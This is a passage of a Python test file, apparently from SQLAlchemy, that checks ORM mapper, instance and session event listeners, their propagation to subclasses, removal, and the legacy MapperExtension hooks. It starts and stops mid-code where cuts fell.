[call.listen4(), call.listen2(), call.listen1(), call.listen3()]
)
def test_insert_flags(self):
users, User = self.tables.users, self.classes.User
m = mapper(User, users)
canary = Mock()
arg = Mock()
event.listen(m, "before_insert", canary.listen1, )
event.listen(m, "before_insert", canary.listen2, insert=True)
event.listen(m, "before_insert", canary.listen3, propagate=True, insert=True)
event.listen(m, "load", canary.listen4)
event.listen(m, "load", canary.listen5, insert=True)
event.listen(m, "load", canary.listen6, propagate=True, insert=True)
u1 = User()
state = u1._sa_instance_state
m.dispatch.before_insert(arg, arg, arg)
m.class_manager.dispatch.load(arg, arg)
eq_(
canary.mock_calls,
[
call.listen3(arg, arg, arg.obj()),
call.listen2(arg, arg, arg.obj()),
call.listen1(arg, arg, arg.obj()),
call.listen6(arg.obj(), arg),
call.listen5(arg.obj(), arg),
call.listen4(arg.obj(), arg)
]
)
def test_merge(self):
users, User = self.tables.users, self.classes.User
mapper(User, users)
canary = []
def load(obj, ctx):
canary.append('load')
event.listen(mapper, 'load', load)
s = Session()
u = User(name='u1')
s.add(u)
s.commit()
s = Session()
u2 = s.merge(u)
s = Session()
u2 = s.merge(User(name='u2')) # noqa
s.commit()
s.query(User).order_by(User.id).first()
eq_(canary, ['load', 'load', 'load'])
def test_inheritance(self):
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
class AdminUser(User):
pass
mapper(User, users)
mapper(AdminUser, addresses, inherits=User,
properties={'address_id': addresses.c.id})
canary1 = self.listen_all(User, propagate=True)
canary2 = self.listen_all(User)
canary3 = self.listen_all(AdminUser)
sess = create_session()
am = AdminUser(name='au1', email_address='au1@e1')
sess.add(am)
sess.flush()
am = sess.query(AdminUser).populate_existing().get(am.id)
sess.expunge_all()
am = sess.query(AdminUser).get(am.id)
am.name = 'au1 changed'
sess.flush()
sess.delete(am)
sess.flush()
eq_(canary1, ['init', 'before_insert', 'refresh_flush', 'after_insert',
'refresh', 'load',
'before_update', 'refresh_flush',
'after_update', 'before_delete',
'after_delete'])
eq_(canary2, [])
eq_(canary3, ['init', 'before_insert', 'refresh_flush', 'after_insert',
'refresh',
'load',
'before_update', 'refresh_flush',
'after_update', 'before_delete',
'after_delete'])
def test_inheritance_subclass_deferred(self):
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
mapper(User, users)
canary1 = self.listen_all(User, propagate=True)
canary2 = self.listen_all(User)
class AdminUser(User):
pass
mapper(AdminUser, addresses, inherits=User,
properties={'address_id': addresses.c.id})
canary3 = self.listen_all(AdminUser)
sess = create_session()
am = AdminUser(name='au1', email_address='au1@e1')
sess.add(am)
sess.flush()
am = sess.query(AdminUser).populate_existing().get(am.id)
sess.expunge_all()
am = sess.query(AdminUser).get(am.id)
am.name = 'au1 changed'
sess.flush()
sess.delete(am)
sess.flush()
eq_(canary1, ['init', 'before_insert', 'refresh_flush', 'after_insert',
'refresh', 'load',
'before_update', 'refresh_flush',
'after_update', 'before_delete',
'after_delete'])
eq_(canary2, [])
eq_(canary3, ['init', 'before_insert', 'refresh_flush', 'after_insert',
'refresh', 'load',
'before_update', 'refresh_flush',
'after_update', 'before_delete',
'after_delete'])
def test_before_after_only_collection(self):
"""before_update is called on parent for collection modifications,
after_update is called even if no columns were updated.
"""
keywords, items, item_keywords, Keyword, Item = (
self.tables.keywords,
self.tables.items,
self.tables.item_keywords,
self.classes.Keyword,
self.classes.Item)
mapper(Item, items, properties={
'keywords': relationship(Keyword, secondary=item_keywords)})
mapper(Keyword, keywords)
canary1 = self.listen_all(Item)
canary2 = self.listen_all(Keyword)
sess = create_session()
i1 = Item(description="i1")
k1 = Keyword(name="k1")
sess.add(i1)
sess.add(k1)
sess.flush()
eq_(canary1,
['init',
'before_insert', 'after_insert'])
eq_(canary2,
['init',
'before_insert', 'after_insert'])
canary1[:] = []
canary2[:] = []
i1.keywords.append(k1)
sess.flush()
eq_(canary1, ['before_update', 'after_update'])
eq_(canary2, [])
def test_before_after_configured_warn_on_non_mapper(self):
User, users = self.classes.User, self.tables.users
m1 = Mock()
mapper(User, users)
assert_raises_message(
sa.exc.SAWarning,
"before_configured' and 'after_configured' ORM events only "
"invoke with the mapper\(\) function or Mapper class as "
"the target.",
event.listen, User, 'before_configured', m1
)
assert_raises_message(
sa.exc.SAWarning,
"before_configured' and 'after_configured' ORM events only "
"invoke with the mapper\(\) function or Mapper class as "
"the target.",
event.listen, User, 'after_configured', m1
)
def test_before_after_configured(self):
User, users = self.classes.User, self.tables.users
m1 = Mock()
m2 = Mock()
mapper(User, users)
event.listen(mapper, "before_configured", m1)
event.listen(mapper, "after_configured", m2)
s = Session()
s.query(User)
eq_(m1.mock_calls, [call()])
eq_(m2.mock_calls, [call()])
def test_instrument_event(self):
Address, addresses, users, User = (self.classes.Address,
self.tables.addresses,
self.tables.users,
self.classes.User)
canary = []
def instrument_class(mapper, cls):
canary.append(cls)
event.listen(Mapper, 'instrument_class', instrument_class)
mapper(User, users)
eq_(canary, [User])
mapper(Address, addresses)
eq_(canary, [User, Address])
def test_instrument_class_precedes_class_instrumentation(self):
users = self.tables.users
class MyClass(object):
pass
canary = Mock()
def my_init(self):
canary.init()
# mapper level event
@event.listens_for(mapper, "instrument_class")
def instrument_class(mp, class_):
canary.instrument_class(class_)
class_.__init__ = my_init
# instrumentationmanager event
@event.listens_for(object, "class_instrument")
def class_instrument(class_):
canary.class_instrument(class_)
mapper(MyClass, users)
m1 = MyClass()
assert attributes.instance_state(m1)
eq_(
[
call.instrument_class(MyClass),
call.class_instrument(MyClass),
call.init()
],
canary.mock_calls
)
class DeclarativeEventListenTest(_RemoveListeners,
fixtures.DeclarativeMappedTest):
run_setup_classes = "each"
run_deletes = None
def test_inheritance_propagate_after_config(self):
# test [ticket:2949]
class A(self.DeclarativeBasic):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
pass
listen = Mock()
event.listen(self.DeclarativeBasic, "load", listen, propagate=True)
class C(B):
pass
m1 = A.__mapper__.class_manager
m2 = B.__mapper__.class_manager
m3 = C.__mapper__.class_manager
a1 = A()
b1 = B()
c1 = C()
m3.dispatch.load(c1._sa_instance_state, "c")
m2.dispatch.load(b1._sa_instance_state, "b")
m1.dispatch.load(a1._sa_instance_state, "a")
eq_(
listen.mock_calls,
[call(c1, "c"), call(b1, "b"), call(a1, "a")]
)
class DeferredMapperEventsTest(_RemoveListeners, _fixtures.FixtureTest):
""""test event listeners against unmapped classes.
This incurs special logic. Note if we ever do the "remove" case,
it has to get all of these, too.
"""
run_inserts = None
def test_deferred_map_event(self):
"""
1. mapper event listen on class
2. map class
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
canary = []
def evt(x, y, z):
canary.append(x)
event.listen(User, "before_insert", evt, raw=True)
m = mapper(User, users)
m.dispatch.before_insert(5, 6, 7)
eq_(canary, [5])
def test_deferred_map_event_subclass_propagate(self):
"""
1. mapper event listen on class, w propagate
2. map only subclass of class
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
class SubSubUser(SubUser):
pass
canary = Mock()
def evt(x, y, z):
canary.append(x)
event.listen(User, "before_insert", canary, propagate=True, raw=True)
m = mapper(SubUser, users)
m.dispatch.before_insert(5, 6, 7)
eq_(canary.mock_calls,
[call(5, 6, 7)])
m2 = mapper(SubSubUser, users)
m2.dispatch.before_insert(8, 9, 10)
eq_(canary.mock_calls,
[call(5, 6, 7), call(8, 9, 10)])
def test_deferred_map_event_subclass_no_propagate(self):
"""
1. mapper event listen on class, w/o propagate
2. map only subclass of class
3. event fire should not receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
canary = []
def evt(x, y, z):
canary.append(x)
event.listen(User, "before_insert", evt, propagate=False)
m = mapper(SubUser, users)
m.dispatch.before_insert(5, 6, 7)
eq_(canary, [])
def test_deferred_map_event_subclass_post_mapping_propagate(self):
"""
1. map only subclass of class
2. mapper event listen on class, w propagate
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
m = mapper(SubUser, users)
canary = []
def evt(x, y, z):
canary.append(x)
event.listen(User, "before_insert", evt, propagate=True, raw=True)
m.dispatch.before_insert(5, 6, 7)
eq_(canary, [5])
def test_deferred_map_event_subclass_post_mapping_propagate_two(self):
"""
1. map only subclass of class
2. mapper event listen on class, w propagate
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
class SubSubUser(SubUser):
pass
m = mapper(SubUser, users)
canary = Mock()
event.listen(User, "before_insert", canary, propagate=True, raw=True)
m2 = mapper(SubSubUser, users)
m.dispatch.before_insert(5, 6, 7)
eq_(canary.mock_calls, [call(5, 6, 7)])
m2.dispatch.before_insert(8, 9, 10)
eq_(canary.mock_calls, [call(5, 6, 7), call(8, 9, 10)])
def test_deferred_instance_event_subclass_post_mapping_propagate(self):
"""
1. map only subclass of class
2. instance event listen on class, w propagate
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
m = mapper(SubUser, users)
canary = []
def evt(x):
canary.append(x)
event.listen(User, "load", evt, propagate=True, raw=True)
m.class_manager.dispatch.load(5)
eq_(canary, [5])
def test_deferred_instance_event_plain(self):
"""
1. instance event listen on class, w/o propagate
2. map class
3. event fire should receive event
"""
users, User = (self.tables.users,
self.classes.User)
canary = []
def evt(x):
canary.append(x)
event.listen(User, "load", evt, raw=True)
m = mapper(User, users)
m.class_manager.dispatch.load(5)
eq_(canary, [5])
def test_deferred_instance_event_subclass_propagate_subclass_only(self):
"""
1. instance event listen on class, w propagate
2. map two subclasses of class
3. event fire on each class should receive one and only one event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
class SubUser2(User):
pass
canary = []
def evt(x):
canary.append(x)
event.listen(User, "load", evt, propagate=True, raw=True)
m = mapper(SubUser, users)
m2 = mapper(SubUser2, users)
m.class_manager.dispatch.load(5)
eq_(canary, [5])
m2.class_manager.dispatch.load(5)
eq_(canary, [5, 5])
def test_deferred_instance_event_subclass_propagate_baseclass(self):
"""
1. instance event listen on class, w propagate
2. map one subclass of class, map base class, leave 2nd subclass
unmapped
3. event fire on sub should receive one and only one event
4. event fire on base should receive one and only one event
5. map 2nd subclass
6. event fire on 2nd subclass should receive one and only one event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
class SubUser2(User):
pass
canary = Mock()
event.listen(User, "load", canary, propagate=True, raw=False)
# reversing these fixes....
m = mapper(SubUser, users)
m2 = mapper(User, users)
instance = Mock()
m.class_manager.dispatch.load(instance)
eq_(canary.mock_calls, [call(instance.obj())])
m2.class_manager.dispatch.load(instance)
eq_(canary.mock_calls, [call(instance.obj()), call(instance.obj())])
m3 = mapper(SubUser2, users)
m3.class_manager.dispatch.load(instance)
eq_(canary.mock_calls, [call(instance.obj()),
call(instance.obj()), call(instance.obj())])
def test_deferred_instance_event_subclass_no_propagate(self):
"""
1. instance event listen on class, w/o propagate
2. map subclass
3. event fire on subclass should not receive event
"""
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
canary = []
def evt(x):
canary.append(x)
event.listen(User, "load", evt, propagate=False)
m = mapper(SubUser, users)
m.class_manager.dispatch.load(5)
eq_(canary, [])
def test_deferred_instrument_event(self):
User = self.classes.User
canary = []
def evt(x):
canary.append(x)
event.listen(User, "attribute_instrument", evt)
instrumentation._instrumentation_factory.\
dispatch.attribute_instrument(User)
eq_(canary, [User])
def test_isolation_instrument_event(self):
User = self.classes.User
class Bar(object):
pass
canary = []
def evt(x):
canary.append(x)
event.listen(Bar, "attribute_instrument", evt)
instrumentation._instrumentation_factory.dispatch.\
attribute_instrument(User)
eq_(canary, [])
@testing.requires.predictable_gc
def test_instrument_event_auto_remove(self):
class Bar(object):
pass
dispatch = instrumentation._instrumentation_factory.dispatch
assert not dispatch.attribute_instrument
event.listen(Bar, "attribute_instrument", lambda: None)
eq_(len(dispatch.attribute_instrument), 1)
del Bar
gc_collect()
assert not dispatch.attribute_instrument
def test_deferred_instrument_event_subclass_propagate(self):
User = self.classes.User
class SubUser(User):
pass
canary = []
def evt(x):
canary.append(x)
event.listen(User, "attribute_instrument", evt, propagate=True)
instrumentation._instrumentation_factory.dispatch.\
attribute_instrument(SubUser)
eq_(canary, [SubUser])
def test_deferred_instrument_event_subclass_no_propagate(self):
users, User = (self.tables.users,
self.classes.User)
class SubUser(User):
pass
canary = []
def evt(x):
canary.append(x)
event.listen(User, "attribute_instrument", evt, propagate=False)
mapper(SubUser, users)
instrumentation._instrumentation_factory.dispatch.\
attribute_instrument(5)
eq_(canary, [])
class LoadTest(_fixtures.FixtureTest):
run_inserts = None
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
mapper(User, users)
def _fixture(self):
User = self.classes.User
canary = []
def load(target, ctx):
canary.append("load")
def refresh(target, ctx, attrs):
canary.append(("refresh", attrs))
event.listen(User, "load", load)
event.listen(User, "refresh", refresh)
return canary
def test_just_loaded(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.close()
sess.query(User).first()
eq_(canary, ['load'])
def test_repeated_rows(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.close()
sess.query(User).union_all(sess.query(User)).all()
eq_(canary, ['load'])
class RemovalTest(_fixtures.FixtureTest):
run_inserts = None
def test_attr_propagated(self):
User = self.classes.User
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
class AdminUser(User):
pass
mapper(User, users)
mapper(AdminUser, addresses, inherits=User,
properties={'address_id': addresses.c.id})
fn = Mock()
event.listen(User.name, "set", fn, propagate=True)
au = AdminUser()
au.name = 'ed'
eq_(fn.call_count, 1)
event.remove(User.name, "set", fn)
au.name = 'jack'
eq_(fn.call_count, 1)
def test_unmapped_listen(self):
users = self.tables.users
class Foo(object):
pass
fn = Mock()
event.listen(Foo, "before_insert", fn, propagate=True)
class User(Foo):
pass
m = mapper(User, users)
u1 = User()
m.dispatch.before_insert(m, None, attributes.instance_state(u1))
eq_(fn.call_count, 1)
event.remove(Foo, "before_insert", fn)
# existing event is removed
m.dispatch.before_insert(m, None, attributes.instance_state(u1))
eq_(fn.call_count, 1)
# the _HoldEvents is also cleaned out
class Bar(Foo):
pass
m = mapper(Bar, users)
b1 = Bar()
m.dispatch.before_insert(m, None, attributes.instance_state(b1))
eq_(fn.call_count, 1)
def test_instance_event_listen_on_cls_before_map(self):
users = self.tables.users
fn = Mock()
class User(object):
pass
event.listen(User, "load", fn)
m = mapper(User, users)
u1 = User()
m.class_manager.dispatch.load(u1._sa_instance_state, "u1")
event.remove(User, "load", fn)
m.class_manager.dispatch.load(u1._sa_instance_state, "u2")
eq_(fn.mock_calls, [call(u1, "u1")])
class RefreshTest(_fixtures.FixtureTest):
run_inserts = None
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
mapper(User, users)
def _fixture(self):
User = self.classes.User
canary = []
def load(target, ctx):
canary.append("load")
def refresh(target, ctx, attrs):
canary.append(("refresh", attrs))
event.listen(User, "load", load)
event.listen(User, "refresh", refresh)
return canary
def test_already_present(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.flush()
sess.query(User).first()
eq_(canary, [])
def test_changes_reset(self):
"""test the contract of load/refresh such that history is reset.
This has never been an official contract but we are testing it
here to ensure it is maintained given the loading performance
enhancements.
"""
User = self.classes.User
@event.listens_for(User, "load")
def canary1(obj, context):
obj.name = 'new name!'
@event.listens_for(User, "refresh")
def canary2(obj, context, props):
obj.name = 'refreshed name!'
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.close()
u1 = sess.query(User).first()
eq_(
attributes.get_history(u1, "name"),
((), ['new name!'], ())
)
assert "name" not in attributes.instance_state(u1).committed_state
assert u1 not in sess.dirty
sess.expire(u1)
u1.id
eq_(
attributes.get_history(u1, "name"),
((), ['refreshed name!'], ())
)
assert "name" not in attributes.instance_state(u1).committed_state
assert u1 in sess.dirty
def test_repeated_rows(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.query(User).union_all(sess.query(User)).all()
eq_(canary, [('refresh', set(['id', 'name']))])
def test_via_refresh_state(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
u1.name
eq_(canary, [('refresh', set(['id', 'name']))])
def test_was_expired(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.flush()
sess.expire(u1)
sess.query(User).first()
eq_(canary, [('refresh', set(['id', 'name']))])
def test_was_expired_via_commit(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.query(User).first()
eq_(canary, [('refresh', set(['id', 'name']))])
def test_was_expired_attrs(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.flush()
sess.expire(u1, ['name'])
sess.query(User).first()
eq_(canary, [('refresh', set(['name']))])
def test_populate_existing(self):
User = self.classes.User
canary = self._fixture()
sess = Session()
u1 = User(name='u1')
sess.add(u1)
sess.commit()
sess.query(User).populate_existing().first()
eq_(canary, [('refresh', None)])
class SessionEventsTest(_RemoveListeners, _fixtures.FixtureTest):
run_inserts = None
def test_class_listen(self):
def my_listener(*arg, **kw):
pass
event.listen(Session, 'before_flush', my_listener)
s = Session()
assert my_listener in s.dispatch.before_flush
def test_sessionmaker_listen(self):
"""test that listen can be applied to individual
scoped_session() classes."""
def my_listener_one(*arg, **kw):
pass
def my_listener_two(*arg, **kw):
pass
S1 = sessionmaker()
S2 = sessionmaker()
event.listen(Session, 'before_flush', my_listener_one)
event.listen(S1, 'before_flush', my_listener_two)
s1 = S1()
assert my_listener_one in s1.dispatch.before_flush
assert my_listener_two in s1.dispatch.before_flush
s2 = S2()
assert my_listener_one in s2.dispatch.before_flush
assert my_listener_two not in s2.dispatch.before_flush
def test_scoped_session_invalid_callable(self):
from sqlalchemy.orm import scoped_session
def my_listener_one(*arg, **kw):
pass
scope = scoped_session(lambda: Session())
assert_raises_message(
sa.exc.ArgumentError,
"Session event listen on a scoped_session requires that its "
"creation callable is associated with the Session class.",
event.listen, scope, "before_flush", my_listener_one
)
def test_scoped_session_invalid_class(self):
from sqlalchemy.orm import scoped_session
def my_listener_one(*arg, **kw):
pass
class NotASession(object):
def __call__(self):
return Session()
scope = scoped_session(NotASession)
assert_raises_message(
sa.exc.ArgumentError,
"Session event listen on a scoped_session requires that its "
"creation callable is associated with the Session class.",
event.listen, scope, "before_flush", my_listener_one
)
def test_scoped_session_listen(self):
from sqlalchemy.orm import scoped_session
def my_listener_one(*arg, **kw):
pass
scope = scoped_session(sessionmaker())
event.listen(scope, "before_flush", my_listener_one)
assert my_listener_one in scope().dispatch.before_flush
def _listener_fixture(self, **kw):
canary = []
def listener(name):
def go(*arg, **kw):
canary.append(name)
return go
sess = Session(**kw)
for evt in [
'after_transaction_create',
'after_transaction_end',
'before_commit',
'after_commit',
'after_rollback',
'after_soft_rollback',
'before_flush',
'after_flush',
'after_flush_postexec',
'after_begin',
'before_attach',
'after_attach',
'after_bulk_update',
'after_bulk_delete'
]:
event.listen(sess, evt, listener(evt))
return sess, canary
def test_flush_autocommit_hook(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
sess, canary = self._listener_fixture(
autoflush=False,
autocommit=True, expire_on_commit=False)
u = User(name='u1')
sess.add(u)
sess.flush()
eq_(
canary,
['before_attach', 'after_attach', 'before_flush',
'after_transaction_create', 'after_begin',
'after_flush', 'after_flush_postexec',
'before_commit', 'after_commit', 'after_transaction_end']
)
def test_rollback_hook(self):
User, users = self.classes.User, self.tables.users
sess, canary = self._listener_fixture()
mapper(User, users)
u = User(name='u1', id=1)
sess.add(u)
sess.commit()
u2 = User(name='u1', id=1)
sess.add(u2)
assert_raises(
sa.orm.exc.FlushError,
sess.commit
)
sess.rollback()
eq_(canary,
['before_attach', 'after_attach', 'before_commit', 'before_flush',
'after_transaction_create', 'after_begin', 'after_flush',
'after_flush_postexec', 'after_transaction_end', 'after_commit',
'after_transaction_end', 'after_transaction_create',
'before_attach', 'after_attach', 'before_commit',
'before_flush', 'after_transaction_create', 'after_begin',
'after_rollback',
'after_transaction_end',
'after_soft_rollback', 'after_transaction_end',
'after_transaction_create',
'after_soft_rollback'])
def test_can_use_session_in_outer_rollback_hook(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
sess = Session()
assertions = []
@event.listens_for(sess, "after_soft_rollback")
def do_something(session, previous_transaction):
if session.is_active:
assertions.append('name' not in u.__dict__)
assertions.append(u.name == 'u1')
u = User(name='u1', id=1)
sess.add(u)
sess.commit()
u2 = User(name='u1', id=1)
sess.add(u2)
assert_raises(
sa.orm.exc.FlushError,
sess.commit
)
sess.rollback()
eq_(assertions, [True, True])
def test_flush_noautocommit_hook(self):
User, users = self.classes.User, self.tables.users
sess, canary = self._listener_fixture()
mapper(User, users)
u = User(name='u1')
sess.add(u)
sess.flush()
eq_(canary, ['before_attach', 'after_attach', 'before_flush',
'after_transaction_create', 'after_begin',
'after_flush', 'after_flush_postexec',
'after_transaction_end'])
def test_flush_in_commit_hook(self):
User, users = self.classes.User, self.tables.users
sess, canary = self._listener_fixture()
mapper(User, users)
u = User(name='u1')
sess.add(u)
sess.flush()
canary[:] = []
u.name = 'ed'
sess.commit()
eq_(canary, ['before_commit', 'before_flush',
'after_transaction_create', 'after_flush',
'after_flush_postexec',
'after_transaction_end',
'after_commit',
'after_transaction_end', 'after_transaction_create', ])
def test_state_before_attach(self):
User, users = self.classes.User, self.tables.users
sess = Session()
@event.listens_for(sess, "before_attach")
def listener(session, inst):
state = attributes.instance_state(inst)
if state.key:
assert state.key not in session.identity_map
else:
assert inst not in session.new
mapper(User, users)
u = User(name='u1')
sess.add(u)
sess.flush()
sess.expunge(u)
sess.add(u)
def test_state_after_attach(self):
User, users = self.classes.User, self.tables.users
sess = Session()
@event.listens_for(sess, "after_attach")
def listener(session, inst):
state = attributes.instance_state(inst)
if state.key:
assert session.identity_map[state.key] is inst
else:
assert inst in session.new
mapper(User, users)
u = User(name='u1')
sess.add(u)
sess.flush()
sess.expunge(u)
sess.add(u)
def test_standalone_on_commit_hook(self):
sess, canary = self._listener_fixture()
sess.commit()
eq_(canary, ['before_commit', 'after_commit',
'after_transaction_end',
'after_transaction_create'])
def test_on_bulk_update_hook(self):
User, users = self.classes.User, self.tables.users
sess = Session()
canary = Mock()
event.listen(sess, "after_begin", canary.after_begin)
event.listen(sess, "after_bulk_update", canary.after_bulk_update)
def legacy(ses, qry, ctx, res):
canary.after_bulk_update_legacy(ses, qry, ctx, res)
event.listen(sess, "after_bulk_update", legacy)
mapper(User, users)
sess.query(User).update({'name': 'foo'})
eq_(
canary.after_begin.call_count,
1
)
eq_(
canary.after_bulk_update.call_count,
1
)
upd = canary.after_bulk_update.mock_calls[0][1][0]
eq_(
upd.session,
sess
)
eq_(
canary.after_bulk_update_legacy.mock_calls,
[call(sess, upd.query, upd.context, upd.result)]
)
def test_on_bulk_delete_hook(self):
User, users = self.classes.User, self.tables.users
sess = Session()
canary = Mock()
event.listen(sess, "after_begin", canary.after_begin)
event.listen(sess, "after_bulk_delete", canary.after_bulk_delete)
def legacy(ses, qry, ctx, res):
canary.after_bulk_delete_legacy(ses, qry, ctx, res)
event.listen(sess, "after_bulk_delete", legacy)
mapper(User, users)
sess.query(User).delete()
eq_(
canary.after_begin.call_count,
1
)
eq_(
canary.after_bulk_delete.call_count,
1
)
upd = canary.after_bulk_delete.mock_calls[0][1][0]
eq_(
upd.session,
sess
)
eq_(
canary.after_bulk_delete_legacy.mock_calls,
[call(sess, upd.query, upd.context, upd.result)]
)
def test_connection_emits_after_begin(self):
sess, canary = self._listener_fixture(bind=testing.db)
sess.connection()
eq_(canary, ['after_begin'])
sess.close()
def test_reentrant_flush(self):
users, User = self.tables.users, self.classes.User
mapper(User, users)
def before_flush(session, flush_context, objects):
session.flush()
sess = Session()
event.listen(sess, 'before_flush', before_flush)
sess.add(User(name='foo'))
assert_raises_message(sa.exc.InvalidRequestError,
'already flushing', sess.flush)
def test_before_flush_affects_flush_plan(self):
users, User = self.tables.users, self.classes.User
mapper(User, users)
def before_flush(session, flush_context, objects):
for obj in list(session.new) + list(session.dirty):
if isinstance(obj, User):
session.add(User(name='another %s' % obj.name))
for obj in list(session.deleted):
if isinstance(obj, User):
x = session.query(User).filter(
User.name == 'another %s' % obj.name).one()
session.delete(x)
sess = Session()
event.listen(sess, 'before_flush', before_flush)
u = User(name='u1')
sess.add(u)
sess.flush()
eq_(sess.query(User).order_by(User.name).all(),
[
User(name='another u1'),
User(name='u1')
]
)
sess.flush()
eq_(sess.query(User).order_by(User.name).all(),
[
User(name='another u1'),
User(name='u1')
]
)
u.name = 'u2'
sess.flush()
eq_(sess.query(User).order_by(User.name).all(),
[
User(name='another u1'),
User(name='another u2'),
User(name='u2')
]
)
sess.delete(u)
sess.flush()
eq_(sess.query(User).order_by(User.name).all(),
[
User(name='another u1'),
]
)
def test_before_flush_affects_dirty(self):
users, User = self.tables.users, self.classes.User
mapper(User, users)
def before_flush(session, flush_context, objects):
for obj in list(session.identity_map.values()):
obj.name += " modified"
sess = Session(autoflush=True)
event.listen(sess, 'before_flush', before_flush)
u = User(name='u1')
sess.add(u)
sess.flush()
eq_(sess.query(User).order_by(User.name).all(),
[User(name='u1')]
)
sess.add(User(name='u2'))
sess.flush()
sess.expunge_all()
eq_(sess.query(User).order_by(User.name).all(),
[
User(name='u1 modified'),
User(name='u2')
]
)
class MapperExtensionTest(_fixtures.FixtureTest):
"""Superseded by MapperEventsTest - test backwards
compatibility of MapperExtension."""
run_inserts = None
def extension(self):
methods = []
class Ext(sa.orm.MapperExtension):
def instrument_class(self, mapper, cls):
methods.append('instrument_class')
return sa.orm.EXT_CONTINUE
def init_instance(
self, mapper, class_, oldinit, instance, args, kwargs):
methods.append('init_instance')
return sa.orm.EXT_CONTINUE
def init_failed(
self, mapper, class_, oldinit, instance, args, kwargs):
methods.append('init_failed')
return sa.orm.EXT_CONTINUE
def reconstruct_instance(self, mapper, instance):
methods.append('reconstruct_instance')
return sa.orm.EXT_CONTINUE
def before_insert(self, mapper, connection, instance):
methods.append('before_insert')
return sa.orm.EXT_CONTINUE
def after_insert(self, mapper, connection, instance):
methods.append('after_insert')
return sa.orm.EXT_CONTINUE
def before_update(self, mapper, connection, instance):
methods.append('before_update')
return sa.orm.EXT_CONTINUE
def after_update(self, mapper, connection, instance):
methods.append('after_update')
return sa.orm.EXT_CONTINUE
def before_delete(self, mapper, connection, instance):
methods.append('before_delete')
return sa.orm.EXT_CONTINUE
def after_delete(self, mapper, connection, instance):
methods.append('after_delete')
return sa.orm.EXT_CONTINUE
return Ext, methods
def test_basic(self):
"""test that common user-defined methods get called."""
User, users = self.classes.User, self.tables.users
Ext, methods = self.extension()
mapper(User, users, extension=Ext())
sess = create_session()
u = User(name='u1')
sess.add(u)
sess.flush()
u = sess.query(User).populate_existing().get(u.id)
sess.expunge_all()
u = sess.query(User).get(u.id)
u.name = 'u1 changed'
sess.flush()
sess.delete(u)
sess.flush()
eq_(methods,
['instrument_class', 'init_instance', 'before_insert',
'after_insert',
'reconstruct_instance',
'before_update', 'after_update', 'before_delete', 'after_delete'])
def test_inheritance(self):
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
Ext, methods = self.extension()
class AdminUser(User):
pass
mapper(User, users, extension=Ext())
mapper(AdminUser, addresses, inherits=User,
properties={'address_id': addresses.c.id})
sess = create_session()
am = AdminUser(name='au1', email_address='au1@e1')
sess.add(am)
sess.flush()
am = sess.query(AdminUser).populate_existing().get(am.id)
sess.expunge_all()
am = sess.query(AdminUser).get(am.id)
am.name = 'au1 changed'
sess.flush()
sess.delete(am)
sess.flush()
eq_(methods,
['instrument_class', 'instrument_class', 'init_instance',
'before_insert', 'after_insert',
'reconstruct_instance',
'before_update', 'after_update', 'before_delete',
'after_delete'])
def test_before_after_only_collection(self):
"""before_update is called on parent for collection modifications,
after_update is called even if no columns were updated.
"""
keywords, items, item_keywords, Keyword, Item = (
self.tables.keywords,
self.tables.items,
self.tables.item_keywords,
self.classes.Keyword,
self.classes.Item)
Ext1, methods1 = self.extension()
Ext2, methods2 = self.extension()
mapper(Item, items, extension=Ext1(), properties={
'keywords': relationship(Keyword, secondary=item_keywords)})
mapper(Keyword, keywords, extension=Ext2())
sess = create_session()
i1 = Item(description="i1")
k1 = Keyword(name="k1")
sess.add(i1)
sess.add(k1)
sess.flush()
eq_(methods1,
['instrument_class', 'init_instance',
'before_insert', 'after_insert'])
eq_(methods2,
['instrument_class', 'init_instance',
'before_insert', 'after_insert'])
del methods1[:]
del methods2[:]
i1.keywords.append(k1)
sess.flush()
eq_(methods1, ['before_update', 'after_update'])
eq_(methods2, [])
def test_inheritance_with_dupes(self):
"""Inheritance with the same extension instance on both mappers."""
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
Ext, methods = self.extension()
class AdminUser(User):
pass
ext = Ext()
mapper(User, users, extension=ext)
mapper(AdminUser, addresses, inherits=User, extension=ext,
properties={'address_id': addresses.c.id})
sess = create_session()
am = AdminUser(name="au1", email_address="au1@e1")
sess.add(am)
sess.flush()
am = sess.query(AdminUser).populate_existing().get(am.id)
sess.expunge_all()
am = sess.query(AdminUser).get(am.id)
am.name = 'au1 changed'
sess.flush()
sess.delete(am)
sess.flush()
eq_(methods,
